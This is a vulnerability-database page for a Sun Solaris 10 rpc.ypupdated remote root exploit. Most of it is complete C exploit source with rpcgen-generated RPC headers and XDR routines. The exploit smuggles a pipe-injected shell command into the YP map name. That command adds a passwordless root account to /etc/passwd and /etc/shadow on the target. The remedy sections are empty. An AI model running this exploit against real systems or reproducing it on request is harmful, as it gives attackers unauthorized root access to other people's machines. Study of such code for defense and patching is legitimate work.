Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

基本字段

漏洞编号：: SSV-7947

披露/发现时间：: 未知

提交时间：: 2008-03-20

漏洞等级：

漏洞类别：: 远程溢出

影响组件：: Solaris

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.3KB

ypk.c: /*update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES) If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV) it executes a shell through which extra commands may be launched on the remote host by passing '|shell command'. i.e. the COMM variable contains a pipe character after which a command may be passed. You may change the command by changing this. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <fcntl.h> #include <rpc/rpc.h> #define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255 typedef struct{ unsigned int yp_buf_len; char * yp_buf_val; } yp_buf; struct ypupdate_args{ char * mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args; #ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #else bool_t xdr_ypupdate_args(); #endif void main(argc, argv) int argc; char *argv[]; { CLIENT * cli; unsigned long prog=100028; unsigned int vers=1; struct sockaddr_in skn; struct timeval timeVal; struct hostent * hostEnt; ypupdate_args ypArg; unsigned long rtnval; unsigned int desc; char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >> /etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;"; if(argc<2) { printf("example: yxp target\n"); exit(1); } timeVal.tv_usec=0; timeVal.tv_sec=15; desc=RPC_ANYSOCK; ypArg.datum.yp_buf_val="x"; ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1; ypArg.key.yp_buf_val="x"; ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1; ypArg.mapname=comm; if ((hostEnt=gethostbyname(argv[1]))==NULL){ printf("gethostbyname failure\n"); exit(1); } skn.sin_family=AF_INET;skn.sin_port=htons(0); bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4); if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){ printf("clntudp_create failure\n"); exit(1); } cli->cl_auth=authunix_create("localhost",0,0,0,0); clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal); } ypupdate_prot.h: /* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _YPUPDATE_PROT_H_RPCGEN #define _YPUPDATE_PROT_H_RPCGEN #include <rpc/rpc.h> /* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */ /* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */ #define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255 typedef struct { u_int yp_buf_len; char *yp_buf_val; } yp_buf; #ifdef __cplusplus extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*); #elif __STDC__ extern bool_t xdr_yp_buf(XDR *, yp_buf*); #else /* Old Style C */ bool_t xdr_yp_buf(); #endif /* Old Style C */ struct ypupdate_args { char *mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args; #ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #else /* Old Style C */ bool_t xdr_ypupdate_args(); #endif /* Old Style C */ struct ypdelete_args { char *mapname; yp_buf key; }; typedef struct ypdelete_args ypdelete_args; #ifdef __cplusplus extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #elif __STDC__ extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #else /* Old Style C */ bool_t xdr_ypdelete_args(); #endif /* Old Style C */ #define YPU_PROG ((u_long)100028) #define YPU_VERS ((u_long)1) #ifdef __cplusplus #define YPU_CHANGE ((u_long)1) extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *); #elif __STDC__ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *); #else /* Old Style C */ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(); extern u_int * ypu_change_1_svc(); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(); extern u_int * ypu_insert_1_svc(); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(); extern u_int * ypu_delete_1_svc(); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(); extern u_int * ypu_store_1_svc(); #endif /* Old Style C */ #endif /* !_YPUPDATE_PROT_H_RPCGEN */ ypupdate_prot_xdr.c: /* * Please do not edit this file. * It was generated using rpcgen. */ #include "ypupdate_prot.h" /* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */ /* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */ bool_t xdr_yp_buf(XDR *xdrs, yp_buf *objp) { register long *buf; if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int *)&objp->yp_buf_len, MAXYPDATALEN)) { return (FALSE); } return (TRUE); } bool_t xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp) { register long *buf; if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->datum)) { return (FALSE); } return (TRUE); } bool_t xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp) { register long *buf; if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } return (TRUE); }

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Sun Solaris &lt;= 10 rpc.ypupdated Remote Root Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

评论前需绑定手机现在绑定